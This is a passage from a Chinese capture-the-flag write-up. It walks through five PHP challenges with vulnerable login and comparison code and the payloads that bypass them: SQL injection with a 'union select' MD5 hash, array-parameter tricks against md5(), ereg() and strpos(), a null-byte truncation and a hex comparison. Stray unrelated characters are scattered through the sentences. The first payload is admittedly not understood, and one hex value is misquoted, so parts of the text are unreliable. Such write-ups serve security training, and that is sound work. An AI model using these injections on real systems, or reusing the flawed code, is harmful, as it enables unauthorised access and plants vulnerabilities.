十六歹鱼、SQL注入or繞過(guò)
<?php
#GOAL: login as admin,then get the flag;
error_reporting(0);
require 'db.inc.php';
function clean($str){
if(get_magic_quotes_gpc()){ //get_magic_quotes_gpc — 獲取當(dāng)前 magic_quotes_gpc 的配置選項(xiàng)設(shè)置
$str=stripslashes($str); //返回一個(gè)去除轉(zhuǎn)義反斜線后的字符串(\' 轉(zhuǎn)換為 ' 等等)。雙反斜線(\\)被轉(zhuǎn)換為單個(gè)反斜線(\)眨猎。
}
return htmlentities($str, ENT_QUOTES);
}
$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);
//$query='SELECT * FROM users WHERE name=\''admin\'\' AND pass=\''or 1 #'\';';
$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
die('Invalid password!');
}
echo $flag;
?>
magic_quotes_gpc 魔術(shù)引號(hào)開(kāi)關(guān)
在magic_quotes_gpc = On的情況下抑进,如果輸入的數(shù)據(jù)有單引號(hào)(')、雙引號(hào)(")睡陪、反斜線(\)與 NULL(NULL 字符)
都會(huì)被加上反斜線
payload:?username=admin\'\' AND pass=\''or 1 #&password=
(暫時(shí)不清楚什么情況)
十七寺渗、密碼md5比較繞過(guò)
<?php
if($_POST[user] && $_POST[pass]) {
mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
mysql_select_db(SAE_MYSQL_DB);
$user = $_POST[user];
$pass = md5($_POST[pass]);
$query = @mysql_fetch_array(mysql_query("select pw from ctf where user=' $user '"));
if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
//strcasecmp:0 - 如果兩個(gè)字符串相等
echo "<p>Logged in! Key: ntcf{**************} </p>";
}
else {
echo("<p>Log in failure!</p>");
}
}
?>
要得到flag,我們需要讓數(shù)據(jù)庫(kù)中取出來(lái)的數(shù)據(jù)$query[pw]
和 md5($_POST[pass])
相等兰迫。
因?yàn)閟ql語(yǔ)句并沒(méi)有進(jìn)行任何過(guò)濾信殊,我們可以使用union select
控制返回的結(jié)果。
payload:?user='and 0=1 union select 'e10adc3949ba59abbe56e057f20f883e' #&pass=123456
執(zhí)行的sql語(yǔ)句為select pw from ctf where user=''and 0=1 union select 'e10adc3949ba59abbe56e057f20f883e' #
and 0=1是為了讓前面的語(yǔ)句沒(méi)有返回結(jié)果汁果,后面的語(yǔ)句控制了輸出結(jié)果為e10adc3949ba59abbe56e057f20f883e涡拘,這一串字符是123456md5加密后的字符,所以只要讓pass=123456就可以滿足條件据德。
十八鲸伴、md5()函數(shù)===使用數(shù)組繞過(guò)
<?php
error_reporting(0);
$flag = 'flag{test}';
if (isset($_GET['username']) and isset($_GET['password'])) {
if ($_GET['username'] == $_GET['password'])
print 'Your password can not be your username.';
else if (md5($_GET['username']) === md5($_GET['password']))
die('Flag: '.$flag);
else
print 'Invalid password';
}
?>
前面提到過(guò)如果是==時(shí)可以用0exxxxx的方式繞過(guò),但這里是===晋控,只能利用php對(duì)數(shù)組進(jìn)行hash運(yùn)算會(huì)返回NULL的特性進(jìn)行汞窗,將name和password分別賦兩個(gè)不同的數(shù)組,這樣就滿足他兩個(gè)不相同但加密后的值卻相同
payload:?username[]=1&password[]=2
十九赡译、ereg()函數(shù)strpos() 函數(shù)用數(shù)組返回NULL繞過(guò)
<?php
$flag = "flag";
if (isset ($_GET['password'])) {
if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
echo 'You password must be alphanumeric';
else if (strpos ($_GET['password'], '--') !== FALSE)
die('Flag: ' . $flag);
else
echo 'Invalid password';
}
?>
- 方法一:ereg()正則函數(shù)可以用%00截?cái)嘀倮簦懊嬉呀?jīng)提到很多次了,這里就不多說(shuō)了,payload:
?password=1%00--
- 方法二:ereg和strpos函數(shù)傳入數(shù)組后返回的都是NULL裹唆,NULL === FALSE 不成立誓斥,進(jìn)入下一個(gè)判斷,NULL !==FLASE成立许帐,返回Flag,payload:
password[]=
二十劳坑、十六進(jìn)制與數(shù)字比較
<?php
error_reporting(0);
function noother_says_correct($temp)
{
$flag = 'flag{test}';
$one = ord('1'); //ord — 返回字符的 ASCII 碼值
$nine = ord('9'); //ord — 返回字符的 ASCII 碼值
$number = '3735929054';
// Check all the input characters!
for ($i = 0; $i < strlen($number); $i++)
{
// Disallow all the digits!
$digit = ord($temp{$i});
if ( ($digit >= $one) && ($digit <= $nine) )
{
// Aha, digit not allowed!
return "flase";
}
}
if($number == $temp)
return $flag;
}
$temp = $_GET['password'];
echo noother_says_correct($temp);
?>
可以看出讓我們輸入password,password通過(guò)一個(gè)for循環(huán)進(jìn)行了限制成畦,每一位不可以大于等于1小于等于9距芬。
后面又要求password=='3735929054',把這一串?dāng)?shù)據(jù)轉(zhuǎn)換為16進(jìn)制后得到0xeadc0de(0x代表16進(jìn)制)循帐,這一串字符每一位都滿足不可以大于等于1小于等于9框仔。
payload:?password=0xdeadc0de